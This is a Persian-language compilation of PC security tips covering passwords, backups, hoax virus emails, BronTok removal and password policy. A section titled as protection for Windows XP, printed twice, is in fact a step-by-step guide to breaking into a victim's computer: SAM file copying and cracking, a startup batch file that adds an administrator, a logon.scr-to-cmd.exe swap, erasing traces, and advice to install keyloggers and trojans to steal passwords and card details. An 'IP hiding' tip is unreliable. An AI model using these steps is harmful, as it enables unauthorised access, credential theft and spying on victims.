انتخاب رمزهای عبور ضعیف : انتخاب رمزهای عبور ضعیف می تواند کاربران را در معرض تهدیدات امنیتی متعددی قرار دهد . حتی اگر کاربران وابسته به شبکه ای نمی باشند که مدیریت شبکه از آنان می خواهد که از رمزهای عبور قوی استفاده و بطور مستمر آنها را تغییر دهند ، می بایست از رمزهای عبور قوی استفاده گردد . از رمزهای عبوری که امکان حدس آنها به سادگی وجود دارد نظیر تاریخ تولد ، نام فرد مورد علاقه ، شماره شناسنامه و … نمی بایست استفاده گردد . تشخیص رمزهای عبور طولانی برای مهاجمان بمراتب مشکل تر است . بنابراین ، پیشنهاد می گردد که از رمزهای عبوری با حداقل هشت حرف استفاده گردد ( چهارده حرف مناسب تر است ) . در برخی موارد مهاجمان به منظور تشخیص رمز عبور کاربران از روش هائی موسوم به حملات “دیکشنری ” استفاده می نمایند . بنابراین ، نمی بایست رمز عبور خود را از کلماتی انتخاب نمود که مشابه آن در دیکشنری موجود باشد . رمز عبوری را انتخاب ننمائید که به دلیل مشکل بودن بخاطر سپردن آن مجبور به نوشتن آن در یک مکان دیگر شد، چراکه این احتمال وجود خواهد داشت که مهاجمان نیز به آن دستیابی پیدا نمایند . برای ایجاد یک رمز عبور ، می توان یک عبارت خاص را در نظر گرفت و از حروف اول هر یک از کلمات آن استفاده نمود.
عدم توجه به ایجاد یک استراتژی خاص برای backup : حتی اگر شما تمامی موارد اشاره شده را رعایت نمائید ، همچنان این احتمال وجود خواهد داشت که مهاجمان به سیستم شما دستیابی و داده موجود بر روی آن را حذف و یا حتی تمامی اطلاعات موجود بر روی هارددیسک را پاک کنند . بنابراین ، لازم است که همواره از اطلاعات مهم موجود backup گرفته شود و از یک برنامه زمانبندی خاص در این رابطه استفاده گردد .
اکثر کاربران نسبت به گرفتن backup و مزایای آن آگاهی کامل دارند ولی تعداد زیادی از آنان هرگز این کار را انجام نمی دهند . برخی دیگر اولین backup را می گیرند ولی آن را به صورت مستمر و سازمان یافته ادامه نمی دهند .
با استفاده از برنامه های موجود در ویندوز نظیر Ntbackup.exe و یا سایر نرم افزارها ، می توان زمانبندی backup را بگونه ای انجام داد که این فرآیند بطور اتوماتیک انجام شود . داده backup را می بایست در یک سرویس دهنده دیگر شبکه و یا درایو removable و در مکانی متمایز از کامپیوتر فعلی نگهداری نمود .
بخاطر داشته باشید که داده مهمترین چیز برروی یک کامپیوتر است . سیستم عامل و سایر برنامه ها را می توان مجددا” نصب نمود ولی بازیابی داده اولیه مشکل و در بسیاری از موارد نیز غیرممکن است .
-
مخفی کردن IP در برابر هکرها
در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده می کنند. با استفاده از این ترفند می توانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان را از دسترس دیگران مخفی نگه دارید.
برای این کار:
۱- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.
۲- در محیط جدید ، از منوی File به قسمت Add/Remove Snap-in بروید.
۳- در پنجره باز شده بر روی دکمه Add کلیک کنید.
۴- در پنجره جدید ، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.
۵- سپس Finish را زده و خارج شوید.
۶- در پنجره قبلی بر روی Ok کلیک کنید.
۷- حال در همان محیط اولیه هستید.آی کناری عبارت IP Security Policy Management زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز تغییر پیدا کند.
۸- در پایان از منوی File به Exit رفته و با انتخاب yes این عملیات را ذخیره کنید.
-
دیگر از طریق ایمیل ویروسی نشوید !!!
یکی از ساده ترین روشهای هکرها و ویروس نویسان ، استفاده از پست الکترونیکی یا ایمیل برای به خطر انداختن امنیت کاربران است. این روش هر اندازه که ساده صورت میگیرد به همان سادگی نیز قابل تشخیص است. چرا که تنها با متون خاص شما را ترقیب به دریافت فایل الصاقی یا کلیک روی یک لینک میکنند. در این ترفند قصد داریم دست این افراد را برای شما رو کنیم تا دیگر به ساده ترین شکل دچار مشکلات امنیتی نشوید.
یک مشکل بسیار گسترده در اینترنت وجود دارد و آن پیغامهای الکترونیکی که در مورد یک ویروس هشدار می دهند و این هشدار در مورد یک email با یک عنوان ( subject ) مشخص می باشد که این email ها ویروس های خطرناک هستند و به کامپیوتر شما آسیب می رسانند.
مثال:
Please do not open up any mail that has this title.
It will erase your whole hard drive. This is a new
e-mail virus and not a lot of people know about
it, just let everyone know, so they won’t be a victim.
Please forward this e-mail to you friends!!!
Remember the title: JOIN THE CREW.
مثال دیگر:
Subject: VIRUS WARNING VERY IMPORTANT
Please read the following message we received from a client.
If you receive an email titled “It Takes Guts to Say ‘Jesus’”
DO NOT open it. It will erase everything on your hard drive. So, you must delete it.
Forward this E-MAIL out to as many people as you can. This is a new, very
malicious virus and not many people know about it. This information was
announced yesterday morning from IBM; please share it with everyone
that might access the internet. Once again, pass this along to EVERYONE in
your address book so that this may be stopped. AOL has said that this is
a very dangerous virus and that there is NO remedy for it at this time.
Please practice cautionary measures.
اگر شما email ای مانند این دیدید آن را برای کسی نفرستید! ویروسهای “Jion The Crew” و “It Takes Guts to Say ‘Jesus’” شوخی هستند! ویروسهای شوخی دیگری وجود دارند مانند:
“Win a Hliday” , “AOL4Free” , “Pen Pal Greetings”, “ghost” , “Deeyenda”
و بد نام ترین آنها “Good times” است.
ویژگیهای اخطار ویروسهای شوخی:
تأکید بسیار
یک هشدار که ویروس فقط با باز کردن پیغام فعال می شود ( شما نمی توانید فقط با باز کردن یک پیفام آلوده شوید مگر اینکه یک پیوست ( attachment ) را باز کنید.
کلمات « این یک ویروس جدید است که بسیاری از مردم آن را نمی شناسند » در آن دیده می شود
دستور العملها به شما می گویند که با دنبال کردن یک لینک آن را برایکسانیکه می شناسید بفرستید.
با اشاره به اینکه ویروس روز قبل بوسیله یک شرکت یا گروه کامپیوتری معتبر مانند “IBM” یا “Microsoft’ و یا … اعلام شده است می خواهند هشدار خود موجه جلوه دهند.
در اینجا یک مثال از یک هشدار حقیقی در مورد ویروس وجود دارد:
Hi all,
There is a virus (a “worm”, actually) currently doing the rounds that
comes packaged in a file called PrettyPark.exe attached to an email.
Apparently it has been around since May last year, but has proliferated
recently and is currently by far the most “popular” subject of enquiries
at Symantec’s anti-virus research center.
The usual rules apply: don’t open it.
Information (including a fix if you are infected) is available at this
site:
Good luck, Take care.
ویژگیهایی که نشان می دهند این ویروس مربوط به یک ویروس واقعی است عبارتند از :
پیغام به شکل ساده و زبان منطقی و مستدل بیان شده است ( بدون هیچگونه بزرگنمایی در لغات )
پیغام در مورد باز کردن یک بایل الصاقی ( attachment ) هشدار نی دهد
پیغام آدرس سایت معتبری را می دهد که در آن می توانید در مورد ویروس اطلاعات بیشتری پیدا کنید.
در پیغام اطلاعاتی در مورد اینکه اگر کامپیوتر شما آلوده به ویروس شد چه کار باید انجام دهید به شما اطلاعاتی میدهد.
در پیغام از شما خواسته نمی شود که آن را برای کسی بفرستید.
-
چگونه از ویندوز XP خود در برابر حمله به کلمه عبور محافظت کنید
» روش اول :
در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید …
خوب این روش ساده بود اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!
به سراغ روش دوم میرویم :
» روش دوم :
۱- ابتدا یک فلاپی Bootable می سازیم .
۲- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)
۳- حالا که فلاپی آماده شد باید با آن سیستم را راه اندازی کرد… اما اگر در Setup سیستم تنظیم شده باشد که با فلاپی راه اندازی نشود …؟!! آنگاه باید به سراغ Setup رفت و در آن تنظیمات لازم را انجام دهیم اگر Setup با کلمه عبور محافظت شود آنگاه باید به Bios ( مقاله نفوذ به بایوس : لینک مقاله بایوس ) نفوذ کنیم.
۴- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .
۵- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :
%Windir%System32Config
Example : c:windowssystem32config
در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.
( نکته : در ویندوز ۲۰۰۰ با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :
۶- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .
» روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
۱- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام MOJTABA مدیر سیستم باشد):
C:Documents and SettingsMOJTABAStart MenuProgramsStartup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر MOJTABA یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور ۱۲۳ وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام Administrator و کلمه عبور ۱۲۳ می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور ۱۲۳ هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم :
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.
» روش پنجم ( البته این روش را من پیدا نکردم اما اشکالات آن را رفع کرده ام)
تا مرحله ۴ را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف – ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
:c
ب – Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32
پ – یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت – حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث – حالا فایل logon.scr را پاک می کنیم :
del logon.scr
ج – حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :
net user Mojtaba 123 /add
این دستور یک حساب کاربری با نام Mojtaba و کلمه عبور ۱۲۳ ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup Mojtaba administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123
این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به ۱۲۳ تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
———————————————— —————————————–نتی ه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و …
دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و … و وب سایت های که سر می زند و حتی کلماتی که چت می کند و … را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین …
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
پنجم …
توصیه های مهم :
۱- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
۲- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
۳- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
۴- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
۵- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
۶- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
۷- هر چند وقت یکبار پسورد خود را عوض کنید.
۸- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید .
-
چگونه از ویندوز XP خود در برابر حمله به کلمه عبور محافظت کنید
» روش اول :
در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید …
خوب این روش ساده بود اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!
به سراغ روش دوم میرویم :
» روش دوم :
۱- ابتدا یک فلاپی Bootable می سازیم .
۲- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)
۳- حالا که فلاپی آماده شد باید با آن سیستم را راه اندازی کرد… اما اگر در Setup سیستم تنظیم شده باشد که با فلاپی راه اندازی نشود …؟!! آنگاه باید به سراغ Setup رفت و در آن تنظیمات لازم را انجام دهیم اگر Setup با کلمه عبور محافظت شود آنگاه باید به Bios ( مقاله نفوذ به بایوس : لینک مقاله بایوس ) نفوذ کنیم.
۴- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .
۵- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :
%Windir%System32Config
Example : c:windowssystem32config
در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.
( نکته : در ویندوز ۲۰۰۰ با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :
۶- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .
» روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
۱- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام MOJTABA مدیر سیستم باشد):
C:Documents and SettingsMOJTABAStart MenuProgramsStartup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر MOJTABA یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور ۱۲۳ وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام Administrator و کلمه عبور ۱۲۳ می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور ۱۲۳ هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم :
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.
» روش پنجم ( البته این روش را من پیدا نکردم اما اشکالات آن را رفع کرده ام)
تا مرحله ۴ را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف – ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
:c
ب – Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32
پ – یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت – حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث – حالا فایل logon.scr را پاک می کنیم :
del logon.scr
ج – حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :
net user Mojtaba 123 /add
این دستور یک حساب کاربری با نام Mojtaba و کلمه عبور ۱۲۳ ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup Mojtaba administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123
این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به ۱۲۳ تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
نتیجه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و …
دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و … و وب سایت های که سر می زند و حتی کلماتی که چت می کند و … را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین …
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
پنجم …
توصیه های مهم :
۱- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
۲- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
۳- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
۴- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
۵- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
۶- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
۷- هر چند وقت یکبار پسورد خود را عوض کنید.
۸- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید .
-
پاک کردن ویروسی که Folder Option را حذف می کند !
شیوه ی پاک کردن ویروس BronTok.A :
در زیر به برخی از ویژگی های این ویروس اشاره می کنیم :
۱ . Folder Options را حذف می کند !
۲ . Registry Tools را قفل می کند !
۳ . Task Manager نمی تواند فایل های مربوط به این ویروس را End کند !
۴ . پس از اجرا شدن ، محتویات My Documents را نمایش می دهد !
۵ . اگر در کادر محاوره ای Run عبارت CMD ، Regedit ، msconfig ، Regedt32 را تایپ کنید ، سیستم بلافاصله Restart می شود !
۶ . اگر روی گزینه ی Log Off یا Turn Off Computer کلیک کنید ، سیستم Restart می شود !
۷ . آی این ویروس شبیه آی یه پوشه است !
همانطور که می دانید فایل های lsass.exe ، winlogon.exe و services.exe از فایل های سیستمی بوده و همیشه در حال اجرا هستند …
اگر شما برنامه ی Process Master را اجرا کنید ، می بینید که این فایل ها در پوشه ی System32 قرار دارند .
اما اگر ویروس BronTok.A روی سیستم شما نصب باشد ، خواهید دید که سه تا فایل دیگر با همین نام ها در حال اجرا هستند !!
یعنی دو تا winlogon.exe ، دو تا lsass.exe و دو تا services.exe !
اما به راحتی میشود فهمید که کدام ویروسند و کدام فایل اصلی ویندوز …
آن سه تا فایلی که مربوط به ویروس میشوند ، در پوشه ای غیر از System32 قرار دارند .
مسیر دقیقشان میشود :
C:Documents and SettingsUserLocal SettingsApplication Data
C نام همان درایویست که ویندوز در آن نصب گردیده و User نام کاربری است که ویروس در آن اجرا شده …
بعد از اینکه با نرم افزار Process Master متوجه شدید که کدام ویروسند ، باید آن ها رو Kill process کنید .
اگر احیانا فایل های دیگری با نام های inetinfo.exe ، csrss.exe و smss.exe نیز در حال اجرا بودند آنها را هم Kill process کنید .البته به شرطی که مسیرشان غیر از
System32 باشد …
حالا وقت آن است که از نرم افزار Kill BronTok.A استفاده کنید .
پس از اینکه نرم افزار Kill BronTok.A کارش تمام شد ، آن را ببندید و به منوی Start برید و روی گزینه ی Search کلیک کنید .
در سمت چپ روی گزینه ی All files and folders کلیک کنید .
در فیلد All or part of the file name عبارت Empty.pif را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .اکنون تمام فایل های پیدا شده را پاک کنید .
دوباره در فیلد مذکور عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
scr،*.exe.*
اکنون از بین فایل های پیدا شده ، هر فایلی که آیش شبیه آی پوشه بود رو پاک کنید .
مجددا در فیلد All or part of the file name عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
job.*
تمام فایل های پیدا شده را پاک کنید .
باز هم در فیلد فوق الذکر عبارت Bron را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
اکنون تمام فایل ها و پوشه های پیدا شده را پاک کنید .
اکنون با خیال راحت کامپیوترتان را Restart کنید .
نکته :
اگر ویندوزتان بیشتر از یک کاربر دارد ، باید تمام عملیات فوق را در همه ی کاربرها انجام دهید .
-
روش شناسایی ویروس
در این مقاله شما با چگونگی تشخیص فایل های آلوده به ویروس یا تروجان آشنا میشوید
شاید بسیار برای شما پیش آمده باشد که فایلی را از کسی دریافت کنید و با وجود آنتی ویروس سیستم شما آلوده شود این به این دلیل است که آنتی ویروس های مختلف یک تروجان یا ویروس را در یک زمان شناسایی نمیکنند و ممکن است یک تروجان را نود۳۲ امروز شناسایی کند ولی همان تروجان را کسپر یک هفته بعد شناسایی کند
برای رفع این مشکل از سایت
virusscan.jotti.org
استفاده میکنیم این سایت یک فایل را با ۱۵ “آنتی ویروس مطرح دنیا به طور همزمان اسکن میکند و نتیجه را در یک جدول به شما گزارش میکند
۱-دکمه Brows را زده و فایل مورد نظر را وارد کنید
۲- برای شروع عملیات اسکن بر روی دکمه Submit کلیک کنید
۳- بعد اتمام اسکن نتیجه را به صورت زیر مشاهده میکنیدوهمان طور کی میبینید تنها سه آنتی ویروس قادر به شناسایی فایل مذکور بودند .
-
انتخاب و محافظت از کلمات عبور
کلمات عبور بخش مهمی از امنیت کامپیوتر هستند و در حقیقت در خط مقدم حفاظت از اکانت کاربران قرار می گیرند. یک کلمه عبور نامناسب ممکن است منجر به سوءاستفاده از کل شبکه شود. بهمین دلیل تمام کارمندان شامل پیمانکاران و فروشندگان که به سیستم شرکت دسترسی دارند مسوول انتخاب کلمه عبور مناسب و محافظت از آن هستند.
در این مقاله به نکاتی در مورد ایجاد کلمات عبور قوی و محافظت از آنها و زمان انقضاء و تغییر آنها اشاره می شود. در حقیقت مخاطب این مقاله تمام افرادی هستند که مسوول اکانت یا هر سیستمی هستند که از طریق آن به شبکه یا اطلاعات غیرعمومی دسترسی دارند.
سیاست کلی
· تمام کلمات عبور در سطح سیستم باید حداقل سه ماه یکبار عوض شوند.
· تمام کلمات عبور سطح کاربر (مانند ایمیل یا کامپیوتر) باید هر شش ماه تغییر کنند که البته تغییر چهار ماهه توصیه می شود.
· اکانتهای کاربری که مجوزهای سطح سیستم دارند باید کلمات عبوری داشته باشند که با کلمات عبور دیگر اکانتهای آن کاربر متفاوت باشد.
· کلمات عبور نباید در ایمیلها یا سایر شکلهای ارتباطات الکترونیکی درج شوند.
· باید رهنمونهای زیر در تمام کلمات عبور سطح سیستم و سطح کاربر رعایت شود.
راهنماییها
راهنمایی کلی ساخت کلمه عبور
کلمات عبور برای اهداف گوناگونی در شرکتها استفاده می شوند. تعدادی از استفاده های معمول اینها هستند:
· اکانتهای سطح کاربر
· اکانتهای دسترسی به وب
· اکانتهای ایمیل
· حفاظت از مونیتور
· کلمه عبور صندوق پستی
· ورود به روتر محلی
چون سیستمهای بسیار کمی از نشانه های یکبارمصرف استفاده می کنند (مانند کلمات عبور دینامیک که فقط یکبار استفاده می شوند)، هرکسی باید از نحوه انتخاب کلمات عبور مناسب آگاه باشد.
کلمات عبور ضعیف معمولا مشخصات زیر را دارند:
· کلمه عبور شامل کمتر از هشت حرف است.
· کلمه عبور کلمه ای است که در یک فرهنگ لغت یافت می شود.
· کلمه عبور کلمه ای است که کاربرد عمومی دارد مانند:
o نام خانوادگی، حیوانات اهلی، دوستان، همکاران، شخصیت های خیالی و غیره
o نامها و اصطلاحات کامپیوتری، فرمانها، سایتها، شرکتها، سخت افزار و نرم افزار.
o نام شرکت یا کلمات مشتق شده از این نام.
o تاریخ های تولد و سایر اطلاعات شخصی مانند آدرس ها و شماره های تلفن.
o الگوهای کلمات یا شماره ها مانند aaabbb، qwerty، zyxwvuts، ۱۲۳۳۲۱ و غیره.
o هرکدام از عبارات فوق بطور برعکس.
o هرکدام از عبارات فوق که تنها با یک رقم شروع یا به آن ختم می شود.
کلمات عبور مناسب مشخصات زیر را دارند:
· شامل هم حروف کوچک و هم بزرگ هستند (a-z و A-Z)
· علاوه بر حروف از ارقام و نشانه ها هم در آنها استفاده می شود مانند ۰-۹ و !@#$%^&*()_+|~=’{}[];<>?./
